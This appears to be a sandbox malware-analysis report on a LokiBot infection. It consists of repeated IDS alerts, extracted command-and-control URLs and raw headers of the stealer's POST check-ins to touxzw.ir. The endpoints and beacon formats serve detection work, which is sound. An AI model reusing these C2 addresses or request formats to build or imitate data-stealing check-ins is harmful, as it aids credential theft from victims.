            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50049 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50042 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50076 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50025
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50076 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50049 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49863
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50090 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50032
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50092 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50060 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50055
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50060 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50088 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50041 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50090 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50036
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49747 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50076 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49747 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49747 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50051 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50076 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50076 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50073 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50073 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50073 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49816
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50039
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50040 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50088 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50090 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50051 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49747 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49747 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50090 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50045
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50083 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50063 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50060 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50049 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50078 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50073 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49990
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50035 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50090 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50063 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50063 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50051 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50063 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50063 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50042
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50088 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50051 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49829 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50083 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50083 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50088 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50060 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50101 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50066 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50060 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50073 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50066 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49829 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49829 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50078 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50078 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50062 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50062 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50062 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50059 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50040
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50059 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50059 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50078 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50078 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49784
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49829 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50037
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50090
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50083 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50083 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50066 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50063
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50047
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50054 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50054 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50054 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50056 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50056 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50056 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49829 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50067 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50056 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50056 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50048 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50048 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50062 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50076
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50059 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:50041
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50048 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50067 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50067 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50062 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.5:49747
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50067 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50101 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50048 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50081 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50093 -> 104.21.48.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50081 -> 104.21.48.1:80
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.1 80Jump to behavior
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 180Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 180Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
            Source: global trafficHTTP traffic detected: POST /fix/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D6457BC8Content-Length: 153Connection: close
